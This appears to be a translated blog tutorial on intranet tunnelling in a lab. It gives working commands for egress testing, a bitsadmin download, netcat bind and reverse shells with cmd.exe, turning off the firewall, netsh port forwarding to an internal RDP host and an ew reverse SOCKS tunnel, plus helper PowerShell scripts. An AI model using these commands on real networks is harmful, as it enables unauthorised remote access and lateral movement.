Establishing tunnels for intranet penetration

1. Detecting which protocols the intranet host can use to reach the outside (egress detection)

Windows systems

1. ICMP egress detection

Ping the IP address of your own VPS (ping vps-ip). A reply means ICMP echo traffic is allowed out; no reply means an ICMP tunnel is not an option (or the VPS itself drops ICMP).

2. DNS egress detection

ping www.baidu.com

nslookup www.baidu.com

Pinging a domain name forces a DNS lookup first. If the name is resolved even though the ping itself gets no reply, DNS queries are leaving the network and a DNS tunnel remains possible; nslookup confirms this directly and shows which resolver answered.

3. TCP egress detection

(1) telnet

telnet vps-ip port

A blank screen means the TCP connection was accepted (something must be listening on that port on the VPS); an immediate "Could not open connection" means it was blocked or refused.

(2) nc

Attacking machine (VPS): nc -lvvp 4444

Victim machine: nc vps-ip 4444

(3) bitsadmin (an HTTP download over TCP 80 using the built-in BITS client, so no extra tool has to be uploaded; the destination must be an absolute local path)

bitsadmin /rawreturn /transfer down "http://120.79.66.58/1.gif" d:\1.txt

(4) PowerShell port test script

powershell -exec bypass -Command "Import-Module .\telnet.ps1; Test-PortConnectivity -Source 'localhost' -RemoteDestination '192.168.3.69' -Port 110 -Iterate -Protocol TCP"

telnet.ps1 is a separate script exporting Test-PortConnectivity and has to be uploaded to the host first.
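The four checks above can be run from one script so that a host's egress options are read off at a glance. The following is an added example, not code from the original post; it uses only .NET classes present in PowerShell 2.0 so it also runs on the Win7 / Server 2003-era hosts in this lab. The VPS address, port and URL are placeholders (assumptions) to be replaced with your own.

```powershell
# Added example, not code from the original post. Runs the four egress checks
# above (ICMP, DNS, raw TCP, HTTP) from one script and prints a summary.
# All addresses below are assumptions: replace them with your own VPS.
$VpsIp     = '203.0.113.10'          # assumption: attacker VPS (TEST-NET-3 range)
$VpsPort   = 4444                    # assumption: nc -lvvp 4444 running on the VPS
$HttpUrl   = "http://$VpsIp/1.gif"   # assumption: any URL served by the VPS
$TimeoutMs = 3000

function Test-IcmpEgress([string]$Ip) {
    # "ping <vps-ip>": one echo request with a 3 s timeout instead of ping's four tries.
    $ping = New-Object System.Net.NetworkInformation.Ping
    try   { return (($ping.Send($Ip, $TimeoutMs)).Status -eq 'Success') }
    catch { return $false }
}

function Test-DnsEgress([string]$Name) {
    # "nslookup <name>": does the host's resolver return any address? If this
    # works while ICMP and TCP fail, DNS queries still leave the network.
    try   { return (([System.Net.Dns]::GetHostAddresses($Name)).Count -gt 0) }
    catch { return $false }
}

function Test-TcpEgress([string]$Ip, [int]$Port) {
    # "telnet <vps-ip> <port>", but with a timeout so a silently dropped SYN does not hang.
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($Ip, $Port, $null, $null)
        if (-not $async.AsyncWaitHandle.WaitOne($TimeoutMs)) { return $false }  # filtered: no answer
        $client.EndConnect($async)                                              # throws if refused
        return $true
    }
    catch   { return $false }
    finally { $client.Close() }
}

function Test-HttpEgress([string]$Url) {
    # The bitsadmin download as a plain HTTP GET. Honours the system proxy, so it
    # also detects the "only the proxy can reach the Internet" case.
    try {
        $req = [System.Net.WebRequest]::Create($Url)
        $req.Timeout = $TimeoutMs
        $req.Proxy   = [System.Net.WebRequest]::DefaultWebProxy
        $req.GetResponse().Close()
        return $true
    }
    catch [System.Net.WebException] {
        # A 404 or 403 still proves HTTP egress: the server answered. Only a missing
        # Response (timeout, connect failure, proxy refusal) means no egress.
        return ($_.Exception.Response -ne $null)
    }
    catch { return $false }
}

$summary = New-Object PSObject -Property @{
    ICMP = Test-IcmpEgress $VpsIp
    DNS  = Test-DnsEgress  'www.baidu.com'
    TCP  = Test-TcpEgress  $VpsIp $VpsPort
    HTTP = Test-HttpEgress $HttpUrl
}
$summary | Format-List ICMP, DNS, TCP, HTTP
```

Read the summary as a decision table: TCP true means a plain nc or ew tunnel will work; TCP false but HTTP true points at a proxy-aware HTTP tunnel; only DNS true leaves a DNS tunnel; all false means the host has no direct route out and another pivot is needed.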

2. Building a protocol tunnel

1. Netsh port forwarding

Netsh is a tool built into Windows for managing network configuration and the firewall. Through the netsh interface portproxy context, an incoming TCP connection can be forwarded to a port on the local machine or on another computer. portproxy handles TCP only, and its listeners are created by the IP Helper service (iphlpsvc): a rule added while that service is stopped is accepted and listed, but nothing actually listens.

Administrative rights are required.

View the existing forwards:
netsh interface portproxy show all

Add an IPv4-to-IPv4 port mapping:
netsh interface portproxy add v4tov4 listenport=22 connectaddress=ip connectport=port

Delete the forward on a given listening port:
netsh interface portproxy delete v4tov4 listenport=port

Firewall control:
netsh advfirewall show allprofiles            show the firewall state for all network profiles
netsh advfirewall set allprofiles state off   turn the firewall off for all profiles
netsh advfirewall set allprofiles state on    turn the firewall back on

Switching the whole firewall off is far more visible than adding a single allow rule, which is what the steps below do instead.

Create a forward (bind) shell:

1. Add a firewall rule on the target that allows inbound TCP connections to port 4444

name: rule name (any name); dir: direction (in/out); action: allow or block; protocol: protocol; localport: local port

netsh advfirewall firewall add rule name="nc in" dir=in action=allow protocol=TCP localport=4444

2. Upload netcat-win32-1.12.zip to the target machine, change into its directory and run nc.exe -lvp 4444 -e cmd.exe

3. On the attacking machine run nc64.exe -nv 192.168.206.129 4444 to receive the forward shell

Create a reverse shell:

Attacking machine

1. Add a firewall rule on the attacking machine that opens port 4443

netsh firewall add portopening TCP 4443 "nc reverse shell"

(netsh firewall is the old pre-Vista context; current Windows still accepts it with a deprecation warning. The equivalent current syntax is netsh advfirewall firewall add rule name="nc reverse shell" dir=in action=allow protocol=TCP localport=4443.)

2. The attacking machine listens on port 4443: nc64.exe -lvp 4443

Target machine

3. Add a firewall rule on the target machine allowing outbound TCP on port 4443

netsh advfirewall firewall add rule name="nc reverse shell" dir=out action=allow protocol=TCP localport=4443

(As written this rule matches the target's own source port, which for an outgoing nc connection is an ephemeral port, not 4443; the attacker's port would be matched with remoteport=4443. Windows allows all outbound traffic by default, so the step only matters if outbound filtering has been enabled.)

4. On the target machine, use the previously uploaded nc to connect to port 4443 of the attacking machine

nc64.exe -nv 192.168.206.1 4443 -e cmd.exe

5. The attacking machine receives the target's shell

6. Although the connection is established, there is no prompt and commands are not executed

7. Investigating step by step, it turned out that the victim machine is 64-bit, so nc64.exe had to be used instead of nc.exe

8. The attacker now has the victim's shell

The connection table on the victim shows local port 49169 connected to port 4443 on the attacking machine, state ESTABLISHED, PID 2560.

CLOSE_WAIT means the remote side has closed its end (or the network dropped the connection) and the local process has not yet closed its socket.

9. tasklist /svc | findstr "2560" identifies, via the PID, that the connection belongs to nc64.exe

10. wmic process queries detailed information about the process (image path, command line)
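The netstat, tasklist and wmic lookups in steps 8 to 10 can be combined into one function that lists every TCP connection on a given port together with its owning process. This is an added example, not code from the original post; it parses netstat -ano and uses Get-WmiObject so it works on Win7 and Server 2003 without Get-NetTCPConnection. Run on the victim it shows the nc64.exe client on its ephemeral port talking to 4443; run on the attacking machine it shows the listener and the accepted socket on 4443.

```powershell
# Added example, not code from the original post. The netstat -> tasklist /svc
# -> wmic triage as one function: every TCP connection whose local or remote
# port matches, with the owning process attached.
function Get-ConnectionOwner {
    param([int]$Port = 4443)   # the reverse-shell port used in the post

    # netstat -ano line:  TCP  192.168.206.129:49169  192.168.206.1:4443  ESTABLISHED  2560
    $pattern = '^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s+(\d+)\s*$'
    foreach ($m in (netstat -ano | Select-String -Pattern $pattern)) {
        $g = $m.Matches[0].Groups
        $localPort  = [int]$g[2].Value
        $remotePort = [int]$g[4].Value
        if ($localPort -ne $Port -and $remotePort -ne $Port) { continue }

        $procId = [int]$g[6].Value
        # Same data as "tasklist /svc | findstr <pid>" and
        # "wmic process where processid=<pid> get name,executablepath,commandline".
        $proc = Get-WmiObject -Class Win32_Process -Filter "ProcessId = $procId"
        if ($proc) { $name = $proc.Name; $path = $proc.ExecutablePath; $cmd = $proc.CommandLine }
        else       { $name = '<exited>';  $path = '';                   $cmd = '' }   # process already gone

        New-Object PSObject -Property @{
            LocalAddress  = $g[1].Value
            LocalPort     = $localPort
            RemoteAddress = $g[3].Value
            RemotePort    = $remotePort
            State         = $g[5].Value      # ESTABLISHED, CLOSE_WAIT, LISTENING, ...
            PID           = $procId
            Process       = $name
            Path          = $path
            CommandLine   = $cmd
        }
    }
}

# On the victim: who is talking to the attacker's 4443?  On the attacker: who listens on 4443?
Get-ConnectionOwner -Port 4443 |
    Format-List LocalAddress, LocalPort, RemoteAddress, RemotePort, State, PID, Process, Path, CommandLine
```

The same function is useful from the defender's side: a cmd.exe or nc64.exe owning an ESTABLISHED connection to an unfamiliar host, or a CommandLine containing -e cmd.exe, is exactly the artefact an incident responder looks for after this technique.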

Forwarding a port of an internal-zone server

Boundary machine

1. Add a firewall rule on the border machine allowing inbound connections to port 8888

netsh advfirewall firewall add rule name="3389 test" dir=in action=allow protocol=TCP localport=8888

2. Add a portproxy rule that forwards traffic arriving from the attacker at port 8888 of the border machine to port 3389 (RDP) of the host in the internal zone

netsh interface portproxy add v4tov4 listenport=8888 connectaddress=192.168.52.129 connectport=3389

3. Check the forwarding rules
netsh interface portproxy show all

(Delete the forward: netsh interface portproxy delete v4tov4 listenport=8888)

4. Check that the border machine is actually listening on port 8888 (the portproxy table lists the rule even when nothing listens, which happens if the IP Helper service is stopped)

Attacking machine

Only one thing needs to be done on the attacking machine: open a Remote Desktop connection to port 8888 of the border machine (192.168.206.129:8888)

This logs in to the Windows Server 2003 host in the internal zone

192.168.206.129 is the IP address of the boundary machine (Windows 7); 192.168.52.129 is the internal host on the segment reachable only through it
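Steps 1 to 4 on the border machine, as one script that also verifies the listener and records the rollback, are given below. This is an added example, not code from the original post; it has to run from an elevated prompt on the border machine and uses the lab addresses above. The rule name is an assumption chosen without spaces so that it passes through PowerShell to netsh unchanged.

```powershell
# Added example, not code from the original post. Steps 1-4 of the border-host
# forward above as one script. Run from an elevated prompt on the border machine.
$ListenPort = 8888               # port exposed on the border machine (192.168.206.129)
$TargetIp   = '192.168.52.129'   # internal-zone host, reachable only via the border machine
$TargetPort = 3389               # RDP on the internal host
$RuleName   = 'rdp-3389-fwd'     # assumption: the post used "3389 test"

# portproxy listeners are created by the IP Helper service. If it is stopped the
# "add" succeeds and "show all" lists the rule, but nothing listens on 8888.
Set-Service   -Name iphlpsvc -StartupType Automatic
Start-Service -Name iphlpsvc

# Step 1: inbound firewall rule for the listening port.
netsh advfirewall firewall add rule name=$RuleName dir=in action=allow protocol=TCP localport=$ListenPort

# Step 2: the forward. portproxy is TCP-only; without listenaddress= it binds every
# interface, so the internal NIC exposes 8888 as well.
netsh interface portproxy add v4tov4 listenport=$ListenPort connectaddress=$TargetIp connectport=$TargetPort

# Step 3: the rule table as netsh records it ...
netsh interface portproxy show all

# Step 4: ... and proof that a socket is actually bound, which "show all" cannot give.
$listener = netstat -ano |
    Select-String -Pattern "^\s*TCP\s+\S+:$ListenPort\s+\S+\s+LISTENING" |
    Select-Object -First 1
if ($listener) {
    Write-Host "Listening: $($listener.Line.Trim())"
    Write-Host "From the attacking machine:  mstsc /v:192.168.206.129:$ListenPort"
} else {
    Write-Warning "Nothing listens on $ListenPort. Check 'Get-Service iphlpsvc' and re-run the add command."
}

# Rollback when done, so no listener or firewall hole is left on the border host:
#   netsh interface portproxy delete v4tov4 listenport=8888
#   netsh advfirewall firewall delete rule name=rdp-3389-fwd
```

The netstat check is the part the original steps leave implicit: a portproxy entry that exists only in the netsh table is the most common reason an RDP connection to the border host's 8888 times out.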

iptables port forwarding


Public IP test (not finished; I will keep trying)

(My VPS is 64-bit; when I searched for ew I thought there was no 64-bit Linux build, which was embarrassing)

1. View the ports open on the VPS

firewall-cmd --list-ports

2. Open ports 6666 and 6667

firewall-cmd --zone=public --add-port=6666/tcp --permanent

firewall-cmd --zone=public --add-port=6667/tcp --permanent

3. Reload the firewall so the permanent rules take effect

4. Check that the ports now show as open

5. The VPS listens on ports 6666 and 6667: the attacking machine connects to 6666 (the SOCKS side), the target machine connects back to 6667

./ew_linux_x64 -s rcsocks -l 6666 -e 6667 &

Reverse SOCKS v5 server (ew rcsocks on the listener, rssocks on the target)

Attacking machine: Windows 7

Target machine: Windows Server 2003

1. On the attacking machine, ew listens on ports 1080 (SOCKS) and 888 (reverse connection)

2. On the target machine, run the ew client so that it connects back to port 888 of the attacking machine

3. The attacking machine shows that the connection has been established

4. Use SocksCap6 (pointed at the local SOCKS port 1080) for subsequent penetration


Source: blog.csdn.net/qq_32393893/article/details/108310652